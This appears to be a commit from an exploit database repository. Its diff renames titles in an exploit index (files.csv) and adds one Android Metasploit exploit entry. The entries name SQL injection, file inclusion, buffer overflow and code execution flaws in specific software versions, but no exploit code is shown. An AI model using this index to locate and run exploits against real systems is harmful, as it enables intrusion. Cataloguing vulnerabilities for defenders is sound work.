DB: 2016-12-30

6 new exploits VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC) VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC) SilverSHielD 1.0.2.34 - (opendir) Denial of Service SilverSHielD 1.0.2.34 - Denial of Service Android - get_user/put_user Exploit (Metasploit) LoudBlog 0.4 - (path) Arbitrary Remote File Inclusion LoudBlog 0.4 - Arbitrary Remote File Inclusion MyEvent 1.3 - (myevent_path) Remote File Inclusion MyEvent 1.3 - 'event.php' Remote File Inclusion LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure LoudBlog 0.5 - SQL Injection / Admin Credentials Disclosure yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion PHP Easy Downloader 1.5 - (save.php) Remote Code Execution PHP Easy Downloader 1.5 - 'save.php' Remote Code Execution Ip Reg 0.3 - Multiple SQL Injections IP Reg 0.3 - Multiple SQL Injections AstroSPACES - 'id' SQL Injection AstroSPACES 1.1.1 - 'id' Parameter SQL Injection myEvent 1.6 - (viewevent.php) SQL Injection myEvent 1.6 - 'eventdate' Parameter SQL Injection Mosaic Commerce - 'category.php cid' SQL Injection Mosaic Commerce - 'cid' Parameter SQL Injection PokerMax Poker League - Insecure Cookie Handling Kure 0.6.3 - (index.php post & doc) Local File Inclusion PokerMax Poker League 0.13 - Insecure Cookie Handling Kure 0.6.3 - 'index.php' Local File Inclusion PHP Easy Downloader 1.5 - (file) File Disclosure PHP Easy Downloader 1.5 - 'file' Parameter File Disclosure Post Affiliate Pro 2.0 - (index.php md) Local File Inclusion Post Affiliate Pro 2.0 - 'md' Parameter Local File Inclusion XOOPS Module GesGaleri - (kategorino) SQL Injection XOOPS Module GesGaleri - SQL Injection zeeproperty - 'adid' SQL Injection zeeproperty - 'adid' Parameter SQL Injection Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion yappa-ng 2.3.3-beta0 - (album) Local File Inclusion Fast Click SQL 1.1.7 Lite - 'init.php' Remote File Inclusion Yappa-ng 2.3.3-beta0 - 'album' Parameter Local File Inclusion WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection Joomla! Component ds-syndicate - (feed_id) SQL Injection XOOPS Module makale - SQL Injection WBB Plugin rGallery 1.09 - 'itemID' Parameter Blind SQL Injection e107 <= 0.7.13 - 'usersettings.php' Blind SQL Injection Joomla! Component ds-syndicate - 'feed_id' Parameter SQL Injection XOOPS Module makale 0.26 - SQL Injection ShopMaker 1.0 - (product.php id) SQL Injection Joomla! Component Daily Message 1.0.3 - 'id' SQL Injection ShopMaker CMS 1.0 - 'id' Parameter SQL Injection Joomla! Component Daily Message 1.0.3 - 'id' Parameter SQL Injection phpcrs 2.06 - (importFunction) Local File Inclusion LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection phpcrs 2.06 - 'importFunction' Parameter Local File Inclusion LoudBlog 0.8.0a - 'ajax.php' SQL Injection YDC - 'kdlist.php cat' SQL Injection YDC - 'cat' Parameter SQL Injection txtshop 1.0b (Windows) - 'Language' Local File Inclusion txtshop 1.0b (Windows) - 'Language' Parameter Local File Inclusion MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection MindDezign Photo Gallery 2.2 - SQL Injection websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution WebSVN 2.0 - Cross-Site Scripting / File Handling / Code Execution Aj RSS Reader - 'EditUrl.php url' SQL Injection Aj RSS Reader - 'url' Parameter SQL Injection WordPress Plugin Media Holder - 'mediaHolder.php id' SQL Injection SFS Ez Forum - 'forum.php id' SQL Injection WordPress Plugin Media Holder - SQL Injection SFS Ez Forum - SQL Injection e107 Plugin EasyShop - (category_id) Blind SQL Injection e107 Plugin EasyShop - 'category_id' Parameter Blind SQL Injection Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection CafeEngine - 'index.php catid' SQL Injection CafeEngine - 'catid' Parameter SQL Injection shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion CafeEngine CMS 2.3 - SQL Injection CafeEngine 2.3 - SQL Injection Yappa-NG 1.x/2.x - Unspecified Remote File Inclusion Yappa-NG 1.x/2.x - Unspecified Cross-Site Scripting Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting LoudBlog 0.41 - podcast.php id Parameter SQL Injection LoudBlog 0.41 - 'podcast.php' SQL Injection LoudBlog 0.41 - backend_settings.php language Parameter Traversal Arbitrary File Access LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access Fast Click SQL Lite 1.1.2/1.1.3 - show.php Remote File Inclusion Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion myEvent 1.2/1.3 - Myevent.php Remote File Inclusion myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion Meeting Room Booking System (MRBS) 1.2.6 - day.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - week.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - month.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - search.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - report.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - help.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'month.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'search.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'report.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'help.php' Cross-Site Scripting yappa-ng - 'index.php' album Parameter Cross-Site Scripting yappa-ng - Query String Cross-Site Scripting Yappa-ng - 'index.php' album Parameter Cross-Site Scripting Yappa-ng - Query String Cross-Site Scripting tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing tinybrowser - 'type' Parameter Cross-Site Scripting tinybrowser - 'tinybrowser.php' Directory Listing tinybrowser - 'edit.php' Directory Listing Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection PHPMailer < 5.2.18 - Remote Code Execution (Python) WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery
2016-12-30 05:01:19 +00:00 · 2016-12-30 05:01:19 +00:00 · 9f1fdff37d
commit 9f1fdff37d
parent f8746c89a4
9 changed files with 431 additions and 72 deletions
--- a/files.csv
+++ b/files.csv
@ -503,7 +503,7 @@ id,file,description,date,author,platform,type,port
 3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service",2007-02-14,mu-b,windows,dos,0
 3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)",2007-02-14,shinnai,windows,dos,0
 3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,windows,dos,0
-3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0
+3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0
 3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0
 3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0
 3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU Consumption) Remote Denial of Service",2007-02-20,Marsu,windows,dos,0
@ -838,7 +838,7 @@ id,file,description,date,author,platform,type,port
 6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
 6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
-6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
+6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
 6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
 6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0
 6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - 'LIST' Remote Denial of Service",2008-10-24,"Alfons Luja",windows,dos,0
@ -8440,6 +8440,7 @@ id,file,description,date,author,platform,type,port
 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
 38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
 40975,platforms/android/local/40975.rb,"Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0
 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0
 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
 38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0
@ -16028,7 +16029,7 @@ id,file,description,date,author,platform,type,port
 1457,platforms/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure",2006-01-29,threesixthousan,php,webapps,0
 1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,php,webapps,0
 1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps,0
-1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - (path) Arbitrary Remote File Inclusion",2006-02-03,rgod,php,webapps,0
+1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - Arbitrary Remote File Inclusion",2006-02-03,rgod,php,webapps,0
 1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,php,webapps,0
 1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection",2006-02-05,SkOd,php,webapps,0
 1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution",2006-02-06,Hessam-x,cgi,webapps,0
@ -16147,7 +16148,7 @@ id,file,description,date,author,platform,type,port
 1682,platforms/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / SQL Injection",2006-04-16,snatcher,php,webapps,0
 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,php,webapps,0
 1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - (/inc/start.php _COOKIE) SQL Bypass Exploit",2006-04-17,Devil-00,php,webapps,0
-1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - (myevent_path) Remote File Inclusion",2006-04-17,botan,php,webapps,0
+1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - 'event.php' Remote File Inclusion",2006-04-17,botan,php,webapps,0
 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0
 1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0
 1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0
@ -16381,7 +16382,7 @@ id,file,description,date,author,platform,type,port
 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0
 2046,platforms/php/webapps/2046.txt,"iManage CMS 4.0.12 - 'absolute_path' Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0
 2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0
-2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0
+2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0
 2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - 'cfg_racine' Parameter Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0
 2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - 'help.php' Remote File Inclusion",2006-07-23,magnific,php,webapps,0
 2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0
@ -16553,7 +16554,7 @@ id,file,description,date,author,platform,type,port
 2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,php,webapps,0
 2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - (x_admindir) Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0
 2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0
-2292,platforms/php/webapps/2292.txt,"yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0
+2292,platforms/php/webapps/2292.txt,"Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0
 2293,platforms/php/webapps/2293.txt,"FlashChat 4.5.7 - (aedating4CMS.php) Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps,0
 2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - (tr) SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0
 2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0
@ -16964,7 +16965,7 @@ id,file,description,date,author,platform,type,port
 2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a - (check_status.php) Remote File Inclusion",2006-11-17,DeltahackingTEAM,php,webapps,0
 2810,platforms/php/webapps/2810.php,"Oxygen 1.1.3 (O2PHP Bulletin Board) - SQL Injection",2006-11-18,DarkFig,php,webapps,0
 2811,platforms/php/webapps/2811.txt,"PHPWebThings 1.5.2 - (editor.php) Remote File Inclusion",2006-11-18,nuffsaid,php,webapps,0
-2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - (save.php) Remote Code Execution",2006-11-18,nuffsaid,php,webapps,0
+2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - 'save.php' Remote Code Execution",2006-11-18,nuffsaid,php,webapps,0
 2813,platforms/asp/webapps/2813.txt,"ASPNuke 0.80 - (register.asp) SQL Injection",2006-11-19,ajann,asp,webapps,0
 2814,platforms/php/webapps/2814.txt,"PHPQuickGallery 1.9 - (textFile) Remote File Inclusion",2006-11-19,"Al7ejaz Hacker",php,webapps,0
 2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 - (adminprint.php) Remote File Inclusion",2006-11-21,irvian,php,webapps,0
@ -18172,7 +18173,7 @@ id,file,description,date,author,platform,type,port
 4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,php,webapps,0
 4769,platforms/php/webapps/4769.txt,"Shadowed Portal 5.7d3 - (POST) Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0
 4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - (category.php) SQL Injection",2007-12-22,Koller,php,webapps,0
-4771,platforms/php/webapps/4771.txt,"Ip Reg 0.3 - Multiple SQL Injections",2007-12-22,MhZ91,php,webapps,0
+4771,platforms/php/webapps/4771.txt,"IP Reg 0.3 - Multiple SQL Injections",2007-12-22,MhZ91,php,webapps,0
 4772,platforms/php/webapps/4772.txt,"zBlog 1.2 - SQL Injection",2007-12-22,Houssamix,php,webapps,0
 4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - (go.php) SQL Injection",2007-12-23,DNX,php,webapps,0
 4775,platforms/php/webapps/4775.txt,"Adult Script 1.6.5 - Multiple SQL Injections",2007-12-23,MhZ91,php,webapps,0
@ -19682,65 +19683,65 @@ id,file,description,date,author,platform,type,port
 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0
 6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'id' Parameter SQL Injection",2008-10-14,Hakxer,php,webapps,0
 6755,platforms/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0
-6758,platforms/php/webapps/6758.txt,"AstroSPACES - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0
+6758,platforms/php/webapps/6758.txt,"AstroSPACES 1.1.1 - 'id' Parameter SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0
 6759,platforms/php/webapps/6759.txt,"mystats - 'hits.php' Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0
-6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - (viewevent.php) SQL Injection",2008-10-15,JosS,php,webapps,0
+6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - 'eventdate' Parameter SQL Injection",2008-10-15,JosS,php,webapps,0
 6762,platforms/php/webapps/6762.txt,"CafeEngine - Multiple SQL Injections",2008-10-16,0xFFFFFF,php,webapps,0
-6763,platforms/php/webapps/6763.txt,"Mosaic Commerce - 'category.php cid' SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0
+6763,platforms/php/webapps/6763.txt,"Mosaic Commerce - 'cid' Parameter SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0
 6764,platforms/php/webapps/6764.php,"Mic_blog 0.0.3 - SQL Injection / Privilege Escalation",2008-10-16,StAkeR,php,webapps,0
 6765,platforms/php/webapps/6765.txt,"IP Reg 0.4 - Multiple SQL Injections",2008-10-16,JosS,php,webapps,0
-6766,platforms/php/webapps/6766.txt,"PokerMax Poker League - Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0
+6766,platforms/php/webapps/6766.txt,"PokerMax Poker League 0.13 - Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0
-6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - (index.php post & doc) Local File Inclusion",2008-10-16,JosS,php,webapps,0
+6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - 'index.php' Local File Inclusion",2008-10-16,JosS,php,webapps,0
 6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker 1.1.3 - Remote Code Execution",2008-10-16,EgiX,php,webapps,0
 6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - 'search.php' SQL Injection",2008-10-16,StAkeR,php,webapps,0
-6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - (file) File Disclosure",2008-10-16,LMaster,php,webapps,0
+6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - 'file' Parameter File Disclosure",2008-10-16,LMaster,php,webapps,0
 6771,platforms/cgi/webapps/6771.txt,"Calendars for the Web 4.02 - Admin Authentication Bypass",2008-10-16,SecVuln,cgi,webapps,0
-6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - (index.php md) Local File Inclusion",2008-10-16,ZeN,php,webapps,0
+6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - 'md' Parameter Local File Inclusion",2008-10-16,ZeN,php,webapps,0
 6777,platforms/php/webapps/6777.txt,"WordPress Plugin st_newsletter - 'stnl_iframe.php' SQL Injection",2008-10-17,r45c4l,php,webapps,0
-6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri - (kategorino) SQL Injection",2008-10-18,EcHoLL,php,webapps,0
+6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri - SQL Injection",2008-10-18,EcHoLL,php,webapps,0
 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0
-6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' SQL Injection",2008-10-18,"Hussin X",php,webapps,0
+6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' Parameter SQL Injection",2008-10-18,"Hussin X",php,webapps,0
 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps,0
 6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - 'del.php' Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0
 6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,php,webapps,0
 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation",2008-10-18,StAkeR,php,webapps,0
-6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion",2008-10-19,NoGe,php,webapps,0
+6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - 'init.php' Remote File Inclusion",2008-10-19,NoGe,php,webapps,0
-6788,platforms/php/webapps/6788.txt,"yappa-ng 2.3.3-beta0 - (album) Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0
+6788,platforms/php/webapps/6788.txt,"Yappa-ng 2.3.3-beta0 - 'album' Parameter Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0
 6789,platforms/php/webapps/6789.pl,"Vivvo CMS 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,php,webapps,0
-6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0
+6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Parameter Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0
-6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection",2008-10-19,girex,php,webapps,0
+6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - 'usersettings.php' Blind SQL Injection",2008-10-19,girex,php,webapps,0
-6792,platforms/php/webapps/6792.txt,"Joomla! Component ds-syndicate - (feed_id) SQL Injection",2008-10-20,boom3rang,php,webapps,0
+6792,platforms/php/webapps/6792.txt,"Joomla! Component ds-syndicate - 'feed_id' Parameter SQL Injection",2008-10-20,boom3rang,php,webapps,0
-6795,platforms/php/webapps/6795.txt,"XOOPS Module makale - SQL Injection",2008-10-20,EcHoLL,php,webapps,0
+6795,platforms/php/webapps/6795.txt,"XOOPS Module makale 0.26 - SQL Injection",2008-10-20,EcHoLL,php,webapps,0
 6796,platforms/php/webapps/6796.txt,"Limbo CMS - (Private Messaging Component) SQL Injection",2008-10-21,StAkeR,php,webapps,0
 6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0
-6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0
+6799,platforms/php/webapps/6799.txt,"ShopMaker CMS 1.0 - 'id' Parameter SQL Injection",2008-10-21,"Hussin X",php,webapps,0
-6802,platforms/php/webapps/6802.txt,"Joomla! Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0
+6802,platforms/php/webapps/6802.txt,"Joomla! Component Daily Message 1.0.3 - 'id' Parameter SQL Injection",2008-10-22,H!tm@N,php,webapps,0
 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0
-6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0
+6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - 'importFunction' Parameter Local File Inclusion",2008-10-22,Pepelux,php,webapps,0
-6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0
+6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - 'ajax.php' SQL Injection",2008-10-22,Xianur0,php,webapps,0
 6809,platforms/php/webapps/6809.txt,"Joomla! Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0
 6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0
-6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0
+6811,platforms/php/webapps/6811.txt,"YDC - 'cat' Parameter SQL Injection",2008-10-22,"Hussin X",php,webapps,0
 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0
-6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Local File Inclusion",2008-10-23,Pepelux,php,webapps,0
+6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Parameter Local File Inclusion",2008-10-23,Pepelux,php,webapps,0
 6817,platforms/php/webapps/6817.txt,"Joomla! Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,php,webapps,0
 6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities",2008-10-23,JosS,php,webapps,0
-6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection",2008-10-23,"CWH Underground",php,webapps,0
+6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - SQL Injection",2008-10-23,"CWH Underground",php,webapps,0
 6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin",2008-10-23,"CWH Underground",php,webapps,0
 6821,platforms/php/webapps/6821.txt,"miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion",2008-10-23,StAkeR,php,webapps,0
-6822,platforms/php/webapps/6822.txt,"websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution",2008-10-23,"GulfTech Security",php,webapps,0
+6822,platforms/php/webapps/6822.txt,"WebSVN 2.0 - Cross-Site Scripting / File Handling / Code Execution",2008-10-23,"GulfTech Security",php,webapps,0
 6823,platforms/php/webapps/6823.txt,"SiteEngine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0
 6826,platforms/php/webapps/6826.txt,"Joomla! Component archaic binary Gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps,0
 6827,platforms/php/webapps/6827.txt,"Joomla! Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,php,webapps,0
-6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'EditUrl.php url' SQL Injection",2008-10-24,yassine_enp,php,webapps,0
+6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'url' Parameter SQL Injection",2008-10-24,yassine_enp,php,webapps,0
 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,php,webapps,0
 6833,platforms/php/webapps/6833.txt,"phpdaily - SQL Injection / Cross-Site Scripting / Local File Download",2008-10-24,0xFFFFFF,php,webapps,0
